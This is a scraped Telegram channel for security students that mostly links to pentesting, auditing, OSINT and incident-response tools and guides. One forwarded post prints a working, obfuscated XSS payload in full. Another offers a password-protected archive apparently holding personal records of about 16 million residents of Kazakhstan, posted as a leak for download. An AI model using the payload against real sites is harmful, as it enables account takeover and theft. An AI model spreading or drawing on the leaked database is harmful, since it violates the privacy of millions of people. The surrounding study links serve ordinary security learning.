SecList for CyberStudents
@SecListForCyberStudents
240 subscribers
606 photos
25 videos
211 files
921 links
Think outside the box
Download Telegram
About
Blog
Apps
Platform
Join
SecList for CyberStudents
240 subscribers
SecList for CyberStudents
https://youtu.be/aM3ipLyz4sw?si=5kRzc1dCZXwmiMjr
YouTube
Leaking the phone number of any Google user ($5k bounty)
An attack on Google services to leak the phone number of any Google user
97 views
SecList for CyberStudents
https://www.ssh-audit.com/hardening_guides.html
77 viewsedited  
SecList for CyberStudents
SecList for CyberStudents
https://www.ssh-audit.com/hardening_guides.html
https://github.com/jtesta/ssh-audit
GitHub
GitHub - jtesta/ssh-audit: SSH server & client security auditing (banner, key exchange, encryption, mac, compression, compatibility…
SSH server & client security auditing (banner, key exchange, encryption, mac, compression, compatibility, security, etc) - jtesta/ssh-audit
88 views
SecList for CyberStudents
https://book.hacktricks.wiki/en/network-services-pentesting/873-pentesting-rsync.html
128 viewsedited  
SecList for CyberStudents
Forwarded from Похек
Интересное видео с демонстрацией Account Takeover через punycode
https://youtu.be/Cj1sOFHDClM

А также статья с примером, как багхантер получил баунти за такую багу
https://infosecwriteups.com/the-most-underrated-0-click-account-takeover-using-punycode-idn-attacks-c0afdb74a3dc

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
96 views
SecList for CyberStudents
Forwarded from Сертификат безопасности
Жители Казахстан 16kk.7z
1 GB
По просьбам трудящихся выкладываю архивный файл "Жители Казахстан 16kk.csv"

Пароль: @qcakz
83 views
SecList for CyberStudents
https://github.com/CiscoCXSecurity/rdp-sec-check
GitHub
GitHub - CiscoCXSecurity/rdp-sec-check: rdp-sec-check is a Perl script to enumerate security settings of an RDP Service (AKA Terminal…
rdp-sec-check is a Perl script to enumerate security settings of an RDP Service (AKA Terminal Services) - CiscoCXSecurity/rdp-sec-check
75 views
SecList for CyberStudents
https://github.com/Hackplayers/evil-winrm
GitHub
GitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentesting
The ultimate WinRM shell for hacking/pentesting. Contribute to Hackplayers/evil-winrm development by creating an account on GitHub.
82 views
SecList for CyberStudents
https://ott3rly.com/mass-hunting-for-leaked-sensitive-documents/
Otterly
Mass Hunting for Leaked Sensitive Documents For Bug Bounties - Otterly
I will cover my own approach, how it is possible to massively hunt for leaked documents which contains PII or other sensitive data.
75 views
SecList for CyberStudents
https://github.com/Nervi0zz0/BTL1-Study-Guide
GitHub
GitHub - Nervi0zz0/BTL1-Study-Guide: This repository contains study materials, notes, and resources to prepare for the Blue Team…
This repository contains study materials, notes, and resources to prepare for the Blue Team Level 1 (BTL1) certification exam. - Nervi0zz0/BTL1-Study-Guide
91 views
SecList for CyberStudents
Forwarded from OSINT
🌃 Инструментарий: Osintgraph - визуализация данных из Instagram*

Инструмент с открытым исходным кодом, разработанный специально для OSINT-анализа данных из Instagram*. Позволяет визуализировать связи между аккаунтами, хэштегами, местоположениями и другими сущностями.

Удобный интерфейс, гибкость и визуальная подача делают Osintgraph интересным решением для анализа цифровых следов в Instagram*.

*Запрещен в России и принадлежит компании Meta, признанной экстремистской и запрещённой на территории РФ


Ссылка на сервис

@osintru
Please open Telegram to view this post
VIEW IN TELEGRAM
82 views
SecList for CyberStudents
https://github.com/000pp/Pinkerton

JavaScript secret scanner
GitHub
GitHub - 0xdsm/Pinkerton: 🕵️ Python project to crawl for JavaScript files and search for secrets like API keys, authorization tokens…
🕵️ Python project to crawl for JavaScript files and search for secrets like API keys, authorization tokens, hardcoded credentials, etc. - 0xdsm/Pinkerton
88 views
SecList for CyberStudents
Forwarded from Cyber Detective
FAKJS

Super fast #go tool that finds different sensitive data in JavaScript files:

- API keys, tokens, etc.
- Internal or hidden endpoints
- Configuration data
- Potential indicators of exposed logic or backend connections

https://github.com/thd3r/fakjs
74 views
SecList for CyberStudents
https://www.notion.so/Web-Exploitation-Suite-1f2b2546f47a807ca4d7c908d9c1a3f1
77 views
SecList for CyberStudents
https://github.com/juliocesarfort/public-pentesting-reports
GitHub
GitHub - juliocesarfort/public-pentesting-reports: A list of public penetration test reports published by several consulting firms…
A list of public penetration test reports published by several consulting firms and academic security groups. - juliocesarfort/public-pentesting-reports
75 views
SecList for CyberStudents
https://github.com/hackthebox/cyber-apocalypse-2025
GitHub
GitHub - hackthebox/cyber-apocalypse-2025: Official writeups for Cyber Apocalypse CTF 2025: Tales from Eldoria
Official writeups for Cyber Apocalypse CTF 2025: Tales from Eldoria - hackthebox/cyber-apocalypse-2025
67 views
SecList for CyberStudents
https://habr.com/ru/companies/ruvds/articles/337934/
Хабр
Удивительно полезный инструмент: lsof
Я привык искать проблемы в коде или в системе, пользуясь логами или показателями мониторинга, которые выводятся на симпатичных панелях управления с простым и понятным интерфейсом. Однако, если по...
68 views
SecList for CyberStudents
https://learn.microsoft.com/en-us/azure/security/fundamentals/log-audit
Docs
Azure security logging and auditing
Learn about the logs available in Azure and the security insights you can gain.
67 views
SecList for CyberStudents
https://httpd.apache.org/docs/current/logs.html
67 viewsedited  
SecList for CyberStudents
Forwarded from Fly Dragon Fly
🔥🔥🔥Crazy!🔥🔥🔥

XSS payload, Cuneiform-alphabet based

"><img/src=x onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(document.domain)')()"
Please open Telegram to view this post
VIEW IN TELEGRAM
83 views
SecList for CyberStudents
https://github.com/meirwah/awesome-incident-response#incident-management
GitHub
GitHub - meirwah/awesome-incident-response: A curated list of tools for incident response
A curated list of tools for incident response. Contribute to meirwah/awesome-incident-response development by creating an account on GitHub.
66 views